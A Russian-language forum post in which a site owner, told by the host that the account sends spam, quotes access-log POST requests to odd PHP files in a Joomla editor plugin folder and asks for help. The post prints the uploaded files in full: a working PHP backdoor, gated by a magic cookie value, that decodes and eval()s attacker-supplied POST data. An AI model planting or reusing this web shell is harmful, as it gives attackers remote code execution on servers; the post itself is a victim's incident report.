Здравствуйте, уважаемые Форумчане. У меня проблема следующая - хостинг сообщил, что с моего аккаунта осуществляется рассылка спама, закрыл доступ к отправке писем с сервера и предложил проанализировать логи. Честно признаюсь, что я анализирую логи впервые. Почитав различные форумы и посты на эту тему, пришёл к выводу, что нужно искать нечто необычное и в особенности логи, содержащие слово POST. Как я понимаю GET – означает, что пользователь просто просмотрел страницу сайта, а POST – как раз означает загрузку какого либо файла.
Мне показались подозрительными логи:
pgs-expert.ru 94.242.233.75 - - [04/Feb/2013:03:24:40 +0400] "POST /plugins/editors/jce/tiny_mce/plugins/print/2d6fc353.php HTTP/1.0" 200 224 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10"
pgs-expert.ru 94.242.233.75 - - [29/Jan/2013:16:00:31 +0400] "POST /images/stories/oobrmr.php HTTP/1.0" 200 44 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
При этом загруженные файлы содержат одинаковый код:
<?php
if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){
if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
echo '<textarea id=areatext>';
eval($msg);
echo '</textarea>bg';
exit;
}}
?>
Вопросы:
1. Являются ли эти файлы вирусными, и могла ли с помощью них выполнятся рассылку спама? Могу ли я удалив данные файлы, сообщить хостингу, что проблема решена и чтобы он открыл доступ к отправке писем с сервера.
2. Как выявить уязвимость, через которую были загружены файла 2d6fc353.php и oobrmr.php? Существует ли какой ни будь простой и надёжный способ защиты сайтов?